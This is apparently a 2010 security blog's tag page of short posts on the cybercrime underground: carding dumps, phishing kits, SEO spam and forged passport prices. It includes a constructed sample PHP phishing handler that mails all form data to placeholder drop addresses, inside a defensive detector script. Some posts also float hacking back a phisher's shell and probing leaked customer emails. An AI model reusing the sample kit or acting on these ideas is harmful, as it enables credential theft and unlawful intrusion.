Posts Tagged ‘underground’

Jeah! Free AWS EC2 instances soon! :-)

23/10/2010

Obviously AWS plans to offer free micro EC2 instances soon! This sounds promising …

I’m quite curious how this offer is used by the underground economy. At least, you need a valid credit card for signing up. ;-)

Hackers, Fraudsters and Botnets: Tackling the Problem of Cyber Crime

03/10/2010

The Australian Standing Committee on Communications of the House of Representatives published a report about cybercrime in June 2010. The set of PDFs can be downloaded here.

Google Talk on Blackhat spam SEO

09/09/2010

Provided by zscaler:

SHADOWS IN THE CLOUD: Investigating Cyber Espionage 2.0

18/07/2010

This is an interesting PDF published a few months ago. So far, it has almost nothing to do with the “cloud” but more with different technologies storing data.

Spam comments selling new CC dumps

06/07/2010

Probably a bot posted a comment on this posting about carders.cc with the intention to sell some new dumps. :-) I think for spammers the search for “carders.cc” is a great opportunity to increase selling rates.

This comment was not marked as spam by WordPress!

Gamers at Risk?

27/06/2010

There have been several blog reports about the risks of game console networks. I’ll dig deeper into this topic during the next weeks and months I think …

Real-Time Phisher Tracking

19/06/2010

For the real weekend feeling, the weekly phishing mail shouldn’t be absent. Hence, today I want to show you how real-time phisher tracking could work …

First of all, I received this email today which pretty much looks like a poorly written phishing email. Nothing strange so far … I took a closer look at what these guys want from the potential victims:

WTF? Are they insane? I mean, they cannot request more than 50 different TANs. For me this was a reason to dig a little bit deeper.

Apparently, they used a PHP-shell for administration of the phishing kit and the underlying system. These shells are quite popular because the phisher does not have to get any SSH account etc … just upload a PHP-shell. Now, it’s quite easy to have a look at the PHP files the phisher used for his attack:

Obviously the phishing kit is poorly written PHP code which greps all the POST data and transfers it to two different email accounts.

If you get access to the PHP-shell it would be possible to change the email addresses and redirect all the phished information to your email account. Furthermore, it would be possible to install a drive-by kit instead of the PHP-shell for compromising the phisher’s system. There are several possibilities one could use to gather further information about the bad guys … however it is always a question whether it is legal or not. This strongly depends on the jurisdiction you are acting in …
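From the hosting side, the kit behaviour described above (all POST data mailed to hard-coded addresses) can be flagged in uploaded PHP files. This is an added example, not code from the original post or from the kit; the sample sources, addresses and the `triage_php` helper are constructed for illustration.

```python
import re

# Constructed sample, not the kit from the post: a handler that mails every
# submitted form field to two hard-coded drop addresses (placeholders).
SAMPLE_KIT = r'''<?php
$msg = "";
foreach ($_POST as $key => $value) {
    $msg .= $key . ": " . $value . "\n";
}
$to = "drop1@example.invalid, drop2@example.invalid";
mail($to, "new data", $msg);
header("Location: thanks.html");
?>'''

# Constructed benign contrast: one named, validated field.
SAMPLE_BENIGN = r'''<?php
$email = filter_var($_POST["email"], FILTER_VALIDATE_EMAIL);
if ($email) { mail("support@example.invalid", "contact", "from " . $email); }
?>'''

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# Plain mail() call, not a method (->mail) or a variable ($mail).
MAIL_CALL_RE = re.compile(r"(?<![\w>$])mail\s*\(")
# Iterating or dumping the whole $_POST array rather than reading named fields.
BULK_POST_RE = re.compile(
    r"foreach\s*\(\s*\$_(?:POST|REQUEST)\b"
    r"|(?:print_r|var_export|implode|http_build_query|json_encode)"
    r"\s*\([^;]*\$_(?:POST|REQUEST)\b"
)

def triage_php(source):
    """Return findings for one PHP file's source text."""
    sends_mail = bool(MAIL_CALL_RE.search(source))
    bulk_post = bool(BULK_POST_RE.search(source))
    recipients = sorted(set(EMAIL_RE.findall(source)))
    return {
        "sends_mail": sends_mail,
        "bulk_post": bulk_post,
        "recipients": recipients,
        # All three together: whole-form capture mailed to fixed addresses.
        "suspicious": sends_mail and bulk_post and bool(recipients),
    }

if __name__ == "__main__":
    for name, src in (("kit", SAMPLE_KIT), ("benign", SAMPLE_BENIGN)):
        print(name, triage_php(src))
```

The extracted recipient addresses are the part worth handing to the mail provider or CERT in an abuse report.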

CARO 2010 Workshop Slides

01/06/2010

Check out the slides of the CARO 2010 Workshop in Helsinki here.

Some statistics about the carders.cc ownage

26/05/2010

I found some nice statistics about the used email addresses and TLDs of the carders.cc customers. As you might have noticed, the dump is out there in the wild, available for download.

Search hacked carders.cc dump for interesting attributes

20/05/2010

Most of my readers probably know already that carders.cc got owned. This time, the German heise magazine was quite fast in reporting. So, the database dump is out in the wild and probably can be found on several hosting possibilities. Thedarkvisitor.com had a nice idea about crawling this dump for IP addresses located in China. What about testing the email addresses against Facebook? Or Google? :D

Russia Ruling Malware Exploit Kit Market

13/05/2010

The latest report from M86 Security reveals that Russia is the leading market for automated malware exploit kits which are widely sold over the Internet to data thieves and phishers. Does this really make you wonder? :D

BTW: This post is dedicated to the new guys in our group focusing on WETs :)

Badboys abuse Microsoft pages for selling stolen credit card information

09/05/2010

I recently did some research on drop boxes for stolen credit card information and by accident came across this Google search result (I modified the picture!):

On the same search, several Microsoft domains came up. Although the information is already deleted from the Microsoft pages, the Google Cache keeps the results. Obviously, MS has huge problems with keeping their pages clean from spam.

HITB stuff released

26/04/2010

I always read the HITB materials from the conferences as well as the magazine. Hence, I just skimmed the second HITB ezine that can be downloaded here. So here’s the content of this ezine:

If you still have time, check out the materials of the HITB 2010 conference.

What’s a real BlackHat SEO?

19/04/2010

This is indeed an interesting view on the SEO business from a completely different point of view. SEO is war, but there are rules in this war that have to be taken into consideration if you plan to win this war.

Fireshark – Linking the malicious web

17/04/2010

Fireshark is a tool, made up of a Firefox plugin and a set of postprocessing scripts that allows you to capture web traffic from the core of your web browser, enabling you to log events and download content to disk for post-process analysis.

Kewl, anyone already tried this?

Sophos publishes research paper on SEO attacks

01/04/2010

If you ask me, it’s time for more papers like this one. All the mentioned words and phrases of SEO attacks are nowadays pretty well known to the public, but only a few know exactly what’s behind the curtain when we talk about SEO. Sophos tries to bring light into this darkness …

PandaLabs Q1 2010 Report

31/03/2010

The report can be downloaded here – contains a lot of information about Operation Mariposa and other stuff.

Prices for Faked German Passports Increased

28/03/2010

A few days ago I stumbled across illegal offers for faked German passports and I was really astonished. A few years ago I saw prices ranging from 50-100 Euros for one passport. Apparently times have changed!

Nowadays, for a complete passport based on faked data you have to pay around 850,- Euros. This includes shipping and escrow.

The sophisticated version costs around 1100,- Euros (including shipping and escrow) and has an additional feature: The information used to create the faked passport is based on real data. The authors claim that this version can also be used in cases where the German credit investigation company (Schufa) is included. Of course, a discount is provided if you order more than 2 passports.

This whole underground industry is focusing on profit only! One last thing I have to add: The authors also claim that the German Postident process can be faked with the help of the sophisticated passports. Scary!
